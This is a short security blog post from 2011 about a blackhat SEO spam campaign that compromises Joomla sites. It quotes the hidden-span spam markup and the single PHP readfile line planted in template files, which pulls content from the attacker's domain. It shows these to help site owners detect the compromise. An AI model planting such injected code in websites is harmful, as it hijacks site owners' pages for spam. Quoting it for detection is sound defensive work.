The Latest in IT Security

Blackhat SPAM SEO From Joomlapoject.net – Targeting Joomla

15
Jun
2011

We are tracking another Blackhat SEO SPAM network being managed by http://joomlapoject.net. By the name of the domain, you can guess that they are targeting Joomla sites.

When you visit a compromised site, you don’t see anything wrong, but if you view the source, there is a large block of spammy links hidden in there:

<span style=”font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px”>
<a href=”http://www.nigeriavillagesquare.com/t3-assets/css/index.php”>ACD
 Systems Canvas 11 with GIS Plus</a><br><a href=”http://www.nigeriavillagesquar.. hundreds more links.

All those links are generated by http://joomlapoject.net/component.php (or global.php), which gets called on the Joomla site by the following code added to the templates index.php:

<?php readfile(“http://joomlapoject.net/component.php”);

If you have a Joomla site make sure it is updated. You can check if it has not been compromised with this crud by viewing the source of your site, or scanning it in here: Sucuri SiteCheck. If you see a warning about SEO SPAM on our scanner, you know your site is hacked.

What’s interesting is that if you search for joomlapoject.net on Google, you will get thousands of sites found because of this warning:

“Warning: readfile(http://joomlapoject.net/component.php)” failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or .

Which probably happened when the joomlapoject site was down, causing all those errors.

Leave a reply


Categories

MONDAY, NOVEMBER 18, 2019
WHITE PAPERS

Mission-Critical Broadband – Why Governments Should Partner with Commercial Operators:
Many governments embrace mobile network operator (MNO) networks as ...

ARA at Scale: How to Choose a Solution That Grows With Your Needs:
Application release automation (ARA) tools enable best practices in...

The Multi-Model Database:
Part of the “new normal” where data and cloud applications are ...

Featured

Archives

Latest Comments